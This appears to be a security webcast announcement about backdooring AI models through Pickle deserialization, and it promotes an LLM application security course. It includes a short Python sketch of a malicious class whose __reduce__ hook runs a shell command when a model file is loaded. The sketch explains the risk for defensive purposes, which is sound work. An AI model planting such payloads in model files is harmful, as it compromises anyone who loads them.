Backdooring AI Models

  • Thursday, 20 Mar 2025 12:00PM EDT (20 Mar 2025 16:00 UTC)
  • Speaker: Ahmed Abugharbia

During this webcast we will examine how AI models can be backdoored using vulnerabilities in serialization formats such as Pickle. We will highlight the risks of loading untrusted models, demonstrate real-world techniques, and discuss strategies for securing AI pipelines against such attacks.
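As a minimal sketch of the class of attack the webcast covers: Python's Pickle format lets an object define a `__reduce__` hook that runs arbitrary code at load time, so a "model" file can carry an executable payload. The class name and payload below are hypothetical examples, not material from the webcast itself.

```python
import pickle
import os

# Hypothetical malicious object: when unpickled, pickle calls the
# callable returned by __reduce__ instead of rebuilding a benign object.
class MaliciousModel:
    def __reduce__(self):
        # On pickle.loads(), this executes a shell command.
        return (os.system, ("echo pwned",))

# The attacker serializes the object and ships it as a "model" file.
payload = pickle.dumps(MaliciousModel())

# A victim loading the file with pickle.loads() (or any loader built on
# pickle, e.g. torch.load with default settings) would run the command:
# pickle.loads(payload)  # executes "echo pwned"
```

Because the code runs during deserialization itself, no method on the loaded object ever needs to be called; simply opening an untrusted model file is enough to be compromised.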

This webcast supports content and knowledge from SEC545: GenAI and LLM Application Security™. To learn more about this course, explore upcoming sessions, and access your FREE demo, click here.